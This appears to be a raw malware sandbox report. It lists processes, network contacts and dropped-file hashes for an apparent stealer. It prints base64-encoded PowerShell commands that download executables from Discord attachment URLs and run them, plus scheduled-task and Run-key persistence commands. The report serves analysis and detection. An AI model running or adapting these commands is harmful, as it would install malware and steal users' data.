"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHkAcQB5ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA2ADAAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADEAOAA3ADgAMAA2ADYANgAzADYAOQA3ADIAMwA2ADAAMAA4AC8AMQAxADgANwA4ADAANgA3ADUANgA0ADAAOAAxADQANwA5ADgAOAAvAG0AdQBjAGsAXwBpAHQAcAAuAGUAeABlAD8AZQB4AD0ANgA1ADkAOAAzAGEAMwBmACYAaQBzAD0ANgA1ADgANQBjADUAMwBmACYAaABtAD0ANwA0ADgAZgA4AGIAZgBiADMAZABmADAAOQBmADYAOQA1ADgAMABkAGEANQA4ADYAMwAyADEANQBhADAAOABhAGIAMgAzAGEAMwA5AGEAMgBmADYANQA2ADMAOQBmAGMAYQA4AGYAMwBkADEAYgA2ADUAYQBiAGEAZABlADkANgAmACcALAAgADwAIwB2AHIAcAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGIAagBiACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGkAdwBiACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnADYANwBXAGkAbgBkAG8AdwBzAFMAZQByAHYAaQBjAGUALgBlAHgAZQAnACkAKQA8ACMAdABnAHIAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAYwBrAHEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHoAaAByACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnADYANwBXAGkAbgBkAG8AdwBzAFMAZQByAHYAaQBjAGUALgBlAHgAZQAnACkAPAAjAHEAbAByACMAPgA="

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn \fds2 /tr "C:\Users\Admin\AppData\Roaming\f32\331.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn \F2g3 /tr "C:\Users\Admin\AppData\Roaming\F2g3\F2g3.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

#cmd

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

#cmd

C:\Windows\SysWOW64\cmd.exe

"cmd" /C schtasks /create /tn \F2g3 /tr "C:\Users\Admin\AppData\Roaming\F2g3\F2g3.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'F2g3';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'F2g3' -Value '"C:\Users\Admin\AppData\Roaming\F2g3\F2g3.exe"' -PropertyType 'String'

C:\Windows\SysWOW64\cmd.exe

"cmd" /C schtasks /create /tn \fds2 /tr "C:\Users\Admin\AppData\Roaming\f32\331.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'dfs1';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'dfs1' -Value '"C:\Users\Admin\AppData\Roaming\f32\331.exe"' -PropertyType 'String'

C:\Users\Admin\AppData\Local\Temp\1HDUEZ.exe

"C:\Users\Admin\AppData\Local\Temp\1HDUEZ.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGEAZABjACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA0ADEAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADEAOAA3ADgANgA3ADAANAA0ADQANgA1ADYAMQA5ADEAMQA2AC8AMQAxADgANwA4ADYANwA1ADAAMAAzADQAOAA3ADAAMgA4ADEAMgAvAEcAMwA2AGQAaAAxAC4AZQB4AGUAJwAsACAAPAAjAHEAZgBxACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAaABtAGwAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaQBzAGYAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcANQBIAEQAVQBFAFoALgBlAHgAZQAnACkAKQA8ACMAZgBjAGQAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAcAB2AGoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHcAaQBkACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnADUASABEAFUARQBaAC4AZQB4AGUAJwApADwAIwBqAGUAZwAjAD4A"

C:\Users\Admin\AppData\Local\Temp\2HDUEZ.exe

"C:\Users\Admin\AppData\Local\Temp\2HDUEZ.exe"

C:\Users\Admin\AppData\Local\Temp\3HDUEZ.exe

"C:\Users\Admin\AppData\Local\Temp\3HDUEZ.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3188 -ip 3188

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3188 -s 804

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

#cmd

C:\Windows\SysWOW64\cmd.exe

"cmd" /C schtasks /create /tn \Gbn1 /tr "C:\Users\Admin\AppData\Roaming\Gbn1\Gbn1.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Gbn1';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Gbn1' -Value '"C:\Users\Admin\AppData\Roaming\Gbn1\Gbn1.exe"' -PropertyType 'String'

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn \Gbn1 /tr "C:\Users\Admin\AppData\Roaming\Gbn1\Gbn1.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f

C:\Users\Admin\AppData\Local\Temp\4HDUEZ.exe

"C:\Users\Admin\AppData\Local\Temp\4HDUEZ.exe"

C:\Users\Admin\AppData\Local\Temp\5HDUEZ.exe

"C:\Users\Admin\AppData\Local\Temp\5HDUEZ.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"

C:\Users\Admin\AppData\Roaming\67WindowsService.exe

"C:\Users\Admin\AppData\Roaming\67WindowsService.exe"

C:\Users\Admin\AppData\Local\Temp\2Zr2dX46csspGcncKPD8h0MgkaG\Runtime Broker.exe

"C:\Users\Admin\AppData\Local\Temp\2Zr2dX46csspGcncKPD8h0MgkaG\Runtime Broker.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "chcp"

C:\Windows\SysWOW64\chcp.com

chcp

C:\Users\Admin\AppData\Local\Temp\2Zr2dX46csspGcncKPD8h0MgkaG\Runtime Broker.exe

"C:\Users\Admin\AppData\Local\Temp\2Zr2dX46csspGcncKPD8h0MgkaG\Runtime Broker.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\vuphhssolhkrwfwq" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAABgAAAAAAAAAGAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1868 --field-trial-handle=1876,i,13471285912979402809,9791034022335403725,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2

C:\Users\Admin\AppData\Local\Temp\2Zr2dX46csspGcncKPD8h0MgkaG\Runtime Broker.exe

"C:\Users\Admin\AppData\Local\Temp\2Zr2dX46csspGcncKPD8h0MgkaG\Runtime Broker.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\vuphhssolhkrwfwq" --mojo-platform-channel-handle=2168 --field-trial-handle=1876,i,13471285912979402809,9791034022335403725,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Users\Admin\AppData\Local\Temp\2HDUEZ.exe

C:\Users\Admin\AppData\Local\Temp\2HDUEZ.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"

Network

Country Destination Domain Proto
US 20.231.121.79:80 tcp
US 8.8.8.8:53 textbin.net udp
US 148.72.177.212:443 textbin.net tcp
US 8.8.8.8:53 19.53.126.40.in-addr.arpa udp
US 8.8.8.8:53 212.177.72.148.in-addr.arpa udp
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 146.78.124.51.in-addr.arpa udp
US 8.8.8.8:53 rentry.co udp
FR 164.132.58.105:443 rentry.co tcp
US 8.8.8.8:53 233.130.159.162.in-addr.arpa udp
US 8.8.8.8:53 105.58.132.164.in-addr.arpa udp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 180.178.17.96.in-addr.arpa udp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
TR 46.1.103.124:2341 tcp
US 8.8.8.8:53 124.103.1.46.in-addr.arpa udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 2.136.104.51.in-addr.arpa udp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 udp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 59.128.231.4.in-addr.arpa udp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 104.241.123.92.in-addr.arpa udp
US 8.8.8.8:53 119.110.54.20.in-addr.arpa udp
US 162.159.130.233:443 cdn.discordapp.com tcp
TR 46.1.103.124:9371 tcp
US 8.8.8.8:53 176.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 211.135.221.88.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp
TR 46.1.103.124:9371 tcp
TR 46.1.103.124:2341 tcp
US 8.8.8.8:53 194.178.17.96.in-addr.arpa udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 174.178.17.96.in-addr.arpa udp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 217.135.221.88.in-addr.arpa udp
US 8.8.8.8:53 www.google.com udp
GB 142.250.200.4:443 www.google.com tcp
US 8.8.8.8:53 4.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.4.4:443 dns.google tcp
US 8.8.8.8:53 4.4.8.8.in-addr.arpa udp
US 104.20.68.143:443 pastebin.com tcp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.186.192:443 ipinfo.io tcp
US 8.8.8.8:53 143.68.20.104.in-addr.arpa udp
US 8.8.8.8:53 192.186.117.34.in-addr.arpa udp
US 8.8.8.8:53 api.gofile.io udp
US 8.8.8.8:53 api.telegram.org udp
FR 151.80.29.83:443 api.gofile.io tcp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 discord.com udp
US 162.159.137.232:443 discord.com tcp
US 8.8.8.8:53 220.167.154.149.in-addr.arpa udp
US 8.8.8.8:53 83.29.80.151.in-addr.arpa udp
US 8.8.8.8:53 store1.gofile.io udp
FR 31.14.70.243:443 store1.gofile.io tcp
US 34.117.186.192:443 ipinfo.io tcp
US 8.8.8.8:53 232.137.159.162.in-addr.arpa udp
US 8.8.8.8:53 243.70.14.31.in-addr.arpa udp
US 162.159.137.232:443 discord.com tcp
US 8.8.8.8:53 18.134.221.88.in-addr.arpa udp

Files

memory/3952-0-0x00007FF764840000-0x00007FF7649A4000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\ivadZKpzcN.sln

MD5 7d447e1ef857ddf5640f2456f2d29e92
SHA1 60131aa77dea336e77892edbf2531c443fbb62e6
SHA256 6a14a1c978a93731c379357248807f069795e1bebb0e0166bccc57a2c5c2559f
SHA512 f02199eea81e1e9c7f3cd1f6c3df9690650b4a43720e1a560099cb15ed6bf8498a2871c8a9130afc30ac58ee6b8c777e2a94c02444b6574555cfdf1129fa8c4d

C:\Users\Admin\AppData\Local\Temp\72MVhG3R68.exe

MD5 805299701ce93e36f34b01f5805c09f5
SHA1 3573f93d3388363e418a4570e6f97270439aeac2
SHA256 d9e4201c44aa17b9a3a1e876ce727cf220ab98b22dc71a8c5002025917fd75db
SHA512 a5140f73f6da312e885587867275fb765bfc56440d1c1fe8c8f7c53797730ecb9c7ba6026f0f0902a9ec6f33d082deb507cafd7b9a0177ab3e5676cb7826031f

memory/3872-8-0x0000000000E10000-0x0000000000E18000-memory.dmp

memory/3872-9-0x00007FFA4E810000-0x00007FFA4F2D1000-memory.dmp

memory/3872-11-0x00007FFA4E810000-0x00007FFA4F2D1000-memory.dmp

memory/3376-13-0x00007FFA4E810000-0x00007FFA4F2D1000-memory.dmp

memory/3376-14-0x00000263C1040000-0x00000263C1050000-memory.dmp

memory/3376-15-0x00000263C1040000-0x00000263C1050000-memory.dmp

memory/3376-25-0x00000263A8DA0000-0x00000263A8DC2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ri4zdybw.oyq.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\GRmgibjD38.exe

MD5 90f04a884d482845cd83e43f781334c3
SHA1 8ac1dfce2b7262e532f2f4fe673580508a45fad2
SHA256 a06db6cf89c5d53c71af847a88de21140163cdc45817ed1c0884c8ceabe8b8e7
SHA512 71faed6315b58e892fbf8ce0118bf1da21fbadae02ba6346b7699dc904805b9858c0b331b2ba1ad6ac90c4ad8d5e859806a5fe2759f6308e99badfa728012433

memory/3840-30-0x0000000000B20000-0x0000000000B28000-memory.dmp

memory/3376-26-0x00000263C1040000-0x00000263C1050000-memory.dmp

memory/3840-32-0x00007FFA4E810000-0x00007FFA4F2D1000-memory.dmp

memory/3840-35-0x00007FFA4E810000-0x00007FFA4F2D1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\iae4YiG8Cc.exe

MD5 91ce0e5d1a87995fc86f6a8cd119a564
SHA1 9e1c741edaa8517140934928dfd22a2b17e77b29
SHA256 14e6fbd1b98b5b4177b5d79b363d538353a5a37a063986fa5364a7554d9a6644
SHA512 78c767a6546fa5f5a02cc9dc35e775c4b49d173a6328f9845abf6da49e0a50e5ad77755f410653b5262b1a3618782fcb10620987fc50984f209f5e926a2f75d9

memory/3184-40-0x00007FFA4E810000-0x00007FFA4F2D1000-memory.dmp

memory/3184-41-0x00000293A9300000-0x00000293A9310000-memory.dmp

memory/3184-42-0x00000293A9300000-0x00000293A9310000-memory.dmp

memory/2040-39-0x00000000007E0000-0x00000000007E8000-memory.dmp

memory/2676-55-0x00000000007C0000-0x00000000007C8000-memory.dmp

memory/2040-57-0x00007FFA4E810000-0x00007FFA4F2D1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\lDE0E7gCkF.exe

MD5 3a12f3e0a5789b83867c96bc812a4437
SHA1 fe2d7c9234de99ab8ab06dc40ff1228bf7a76737
SHA256 c1232df3595cd2aed4c72c16a4c52c0687c1ab13df937c3251a49a254e3b6141
SHA512 9c506529f8294f542a4f4e033631e7a2e4bd4f455fb16e95884f279fdf99721355405690936d610294d3210ac9f8924c2209a951c47881cc4448df12523dc741

memory/2676-58-0x00007FFA4E810000-0x00007FFA4F2D1000-memory.dmp

memory/3952-59-0x00007FF764840000-0x00007FF7649A4000-memory.dmp

memory/3184-60-0x00000293A9300000-0x00000293A9310000-memory.dmp

memory/2040-63-0x00007FFA4E810000-0x00007FFA4F2D1000-memory.dmp

memory/2676-64-0x00007FFA4E810000-0x00007FFA4F2D1000-memory.dmp

memory/4024-66-0x000001E65A140000-0x000001E65A150000-memory.dmp

memory/4024-65-0x00007FFA4E810000-0x00007FFA4F2D1000-memory.dmp

memory/3376-69-0x00007FFA4E810000-0x00007FFA4F2D1000-memory.dmp

memory/3376-73-0x00000263C1040000-0x00000263C1050000-memory.dmp

memory/400-74-0x00007FFA4E810000-0x00007FFA4F2D1000-memory.dmp

memory/400-72-0x00000000001C0000-0x00000000001C8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\TgGaRENDNj.exe

MD5 07a019680ddb018e31af5754664b022b
SHA1 84b3a70ce3952bb84b6fb1b95a6d48d548726344
SHA256 d04655956d4e76da0fb9ba22e903a29bb16a836083e73faab8de9b1bc54d5c58
SHA512 fd0cfef98f9883062e0dab7236574261797e8e9c47c87c388f52c20bf54192a0c62d08b8c11e22d367d93100c48dcb87abb1a4df7fc36b0ec7645f095287a3c4

memory/3376-84-0x00000263C1040000-0x00000263C1050000-memory.dmp

memory/3952-86-0x00007FF764840000-0x00007FF7649A4000-memory.dmp

memory/4080-87-0x00007FFA4E810000-0x00007FFA4F2D1000-memory.dmp

memory/4080-88-0x00000253E9890000-0x00000253E98A0000-memory.dmp

memory/4080-98-0x00000253E9890000-0x00000253E98A0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\DpVrSTzNdI.exe

MD5 d0c32ff1da809dda5724a90a5dd80ff5
SHA1 18f52952e62edb4ef0d31fa3b1aecb8678ccde1a
SHA256 1a2e7d970dea301dc3480138506bf76dc01f82150ed8224a3f44136a777ce3a4
SHA512 714cc6a0838f4dbb768632b4697c69f721badf0ee8169277c85a9cbdceff0fa668355767c7c8790ee605566f2deeeb87d4a7415bd34a3b8fd151cb4b6a54d3cb

C:\Users\Admin\AppData\Local\Temp\yZtqouRvwD.exe

MD5 09d004710e617e57d92d16e7029b23ba
SHA1 386dd985f2d8472f4c8d1e0d9c0eb85b62f4f3f0
SHA256 5a484a2241fe121e65f290a39a5c1971ef6dcd2c8a854cad2bd5d3317c31f5af
SHA512 bda9540b90ea784da828252572ce169b9916e0bd27720080a9488d2516f0f4df0dc0632adb57c30cb8f540668003eb8e5e4258c8c998ad169417be54e7d90994

memory/4804-106-0x0000000000370000-0x0000000000378000-memory.dmp

memory/400-109-0x00007FFA4E810000-0x00007FFA4F2D1000-memory.dmp

memory/3184-110-0x00007FFA4E810000-0x00007FFA4F2D1000-memory.dmp

memory/4024-108-0x000001E65A140000-0x000001E65A150000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\TgGaRENDNj.exe.log

MD5 28d7fcc2b910da5e67ebb99451a5f598
SHA1 a5bf77a53eda1208f4f37d09d82da0b9915a6747
SHA256 2391511d0a66ed9f84ae54254f51c09e43be01ad685db80da3201ec880abd49c
SHA512 2d8eb65cbf04ca506f4ef3b9ae13ccf05ebefab702269ba70ffd1ce9e6c615db0a3ee3ac0e81a06f546fc3250b7b76155dd51241c41b507a441b658c8e761df6

memory/4804-112-0x00007FFA4E810000-0x00007FFA4F2D1000-memory.dmp

memory/3184-114-0x00000293A9300000-0x00000293A9310000-memory.dmp

memory/3936-113-0x0000000000930000-0x0000000000944000-memory.dmp

memory/3184-115-0x00000293A9300000-0x00000293A9310000-memory.dmp

memory/4660-116-0x00000169377D0000-0x00000169377E0000-memory.dmp

memory/3376-101-0x00000263C1040000-0x00000263C1050000-memory.dmp

memory/3936-117-0x00000000056F0000-0x0000000005C94000-memory.dmp

memory/3936-125-0x0000000074D40000-0x00000000754F0000-memory.dmp

memory/4660-136-0x00000169377D0000-0x00000169377E0000-memory.dmp

memory/4804-137-0x00007FFA4E810000-0x00007FFA4F2D1000-memory.dmp

memory/4496-141-0x0000000000400000-0x000000000040A000-memory.dmp

memory/3184-142-0x00000293A9300000-0x00000293A9310000-memory.dmp

memory/4920-145-0x0000000074D40000-0x00000000754F0000-memory.dmp

memory/3376-140-0x00007FFA4E810000-0x00007FFA4F2D1000-memory.dmp

memory/2056-148-0x0000000002AC0000-0x0000000002AF6000-memory.dmp

memory/4496-149-0x0000000074D40000-0x00000000754F0000-memory.dmp

memory/3936-147-0x0000000074D40000-0x00000000754F0000-memory.dmp

memory/4024-159-0x000001E65A140000-0x000001E65A150000-memory.dmp

memory/4024-146-0x00007FFA4E810000-0x00007FFA4F2D1000-memory.dmp

memory/2900-139-0x0000000000400000-0x0000000000412000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 556084f2c6d459c116a69d6fedcc4105
SHA1 633e89b9a1e77942d822d14de6708430a3944dbc
SHA256 88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8
SHA512 0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

memory/2900-162-0x0000000074D40000-0x00000000754F0000-memory.dmp

memory/2056-163-0x00000000050A0000-0x00000000050B0000-memory.dmp

memory/2820-164-0x00007FFA4E810000-0x00007FFA4F2D1000-memory.dmp

memory/2820-166-0x0000015CE57B0000-0x0000015CE57C0000-memory.dmp

memory/4152-165-0x0000000074D40000-0x00000000754F0000-memory.dmp

memory/2056-161-0x00000000056E0000-0x0000000005D08000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 ec484f5eba2f29de745101dfa991b523
SHA1 7c21ecc9206a1a9162f399a6034881f45947b340
SHA256 a64ce3f37231c19aed671a3f57c9be4faf8980fd9aff3c683fa3565abdcdedc2
SHA512 564252e7a8d5f95b8e047d9469b11ef45074a102a10fc20a22df1b7aabf089015854b632dbf6a62d3176b5543dc9cf11d66418b71220535207211569a38c9d32

memory/4920-138-0x0000000074D40000-0x00000000754F0000-memory.dmp

memory/4660-132-0x00007FFA4E810000-0x00007FFA4F2D1000-memory.dmp

memory/4920-130-0x0000000000780000-0x000000000079C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1HDUEZ.exe

MD5 f82cf62e361425ad7f7abd488c58625e
SHA1 e5284d6627f0d20c123a5db0da704aa76fc546c7
SHA256 6835d51782571f939fd87344e436114a0380f167bc802bc3d40937881f945282
SHA512 337b1b20bde44627c3c500412b7c94afbefafcd51d905be6926d7579f1435fbbf2317337ea660a471a1469184c9f67ea6110c50167006b1418c5a6b48bdb250f

C:\Users\Admin\AppData\Local\Temp\2HDUEZ.exe

MD5 2ed61e57f0d8ceff7e8321ad66163936
SHA1 c8aed1f12585b097edc2cb8e15107269cddb651a
SHA256 2ef3bbfd80375dd5923fd3f2416db4ab565d8b8b316c6d5a2d8ca0be117ba4e9
SHA512 2cc6fec9fb2955a10a3dc704c0293d9dbf9252347b8aacb5b1e4f3cfffe4bc4e468f45b5f79297b8f19a21ccfd41b4b1e2cb041f7bd3c0acdb3e47878c065c74

C:\Users\Admin\AppData\Local\Temp\2HDUEZ.exe

MD5 d9444784b17de96bcb01f25b76493516
SHA1 73429592dbbb4fd4759ff34cb130a50cc9963fee
SHA256 8b87c8da8c067d152bf3dda4f2297617ab8d69e0e6030ff28b215fa25ec3bf2e
SHA512 6e0b7644529e03fa0b289416ffa6adf6c9d2d29421fac71bbee7b993c4d11216f09ca4ee0d40e20a176559f4a043d5f6616f65f629953039311e37bb5a55ee30

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 23dc3b3280c3159a4731608ccab1c5d7
SHA1 6b2f95cbc74c129f40048377fba341b1e7633f58
SHA256 fff52d9b672eadfcd31b6dbd88572b1c4c882bcfbcde717ed1b5b780d7e44264
SHA512 fe83b97772a2253fe39ef7c1c214f2f9859d89402abbd4c5e94b0f1b584f49ad5c88f4f0d2af06601be29e6b9cc61f0ddd22053a19e14adac85150fcdea7936f

C:\Users\Admin\AppData\Local\Temp\2HDUEZ.exe

MD5 ba6b7e46fb6f406fbdbf053d91121052
SHA1 0511a77fd487a2a7b80c87354607ffd003e7a591
SHA256 f4a0103f28793ac5f82ee3877b0c93e0b468168654c45c5354c9401716f689f3
SHA512 45b70ca84a03d373153f1d46eb22626723b2be6a4cbdf1a056d20dd8113a002f23f1f8aaea8ab1f35cd47bd281a91770c06879e1d8a1dec70b1d0a6fbd081dc7

C:\Users\Admin\AppData\Local\Temp\3HDUEZ.exe

MD5 39349a7618b759e79e6e979656d784fc
SHA1 cd04607f381a5dc63894e83ce1b1308676dc266f
SHA256 d49dc906b99468d336b8a374ce574bc1bcec9086a8e35421f3fabbbdc5f5f57a
SHA512 1162a76a5002a5b5ca021b64bc5154a0cf5780169109b00ace85bf0a31ada840e40923a37de7d51f5a2deb801baa5607507b9bbcc3ee4810cfb513e98c0c2ee5

C:\Users\Admin\AppData\Local\Temp\3HDUEZ.exe

MD5 ff889e21ecb0ded985dab0bf9e9c44e7
SHA1 8e526041692704f44438d75a5457e919de4d2ce6
SHA256 69d18fad90d0face44e569e507dd43e4482340db276ec823ecdd565f3c8fc475
SHA512 edd1599fe2a163bce4972e258d7cb6a4dd3aca079679dd5382a3985a96b8b0d318d11cd4bd91f770a79f14d7a4733551af2c89bdbb34d0387ce1d774bd632c25

C:\Users\Admin\AppData\Local\Temp\3HDUEZ.exe

MD5 42463ae9e0a6516a9252a98539d4faa4
SHA1 e888903997ea4141b35692be5e48b9f8f7c10115
SHA256 0c5637760ff195c53e9662fb5957b4103bbf8a8f1a0fb5c039f089611eb1da42
SHA512 63494b56774e82a44a4d8c6120c86cef86e7a0f17327ff72a7cf17b600c8ff4fa8ce957e38c8e3c1090c49d0d247cae1fcf14225beaadc70f0451a227509f7af

C:\Users\Admin\AppData\Local\Temp\4HDUEZ.exe

MD5 c19dee054be62335c56a122faf2a8f3c
SHA1 444ad4137b608f88280ea11999dd3f69a49d7abc
SHA256 ba7eb2265bf917f908c95371ba758f4c865a27a80b39bc353a099d4b865a525f
SHA512 91eec7bba9f25f1103b750675ff92e1aa34ebf8f22a8488c57c5b87ab259a24c666a0e4dc95949cd49b533392fee3471fe9f3b4d94ab7b760502bc383ea8c72c

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 027f752ee0cbbc3ac151148c1292faee
SHA1 79a3e6fd6e0a6db95f8d45eb761a629c260f937c
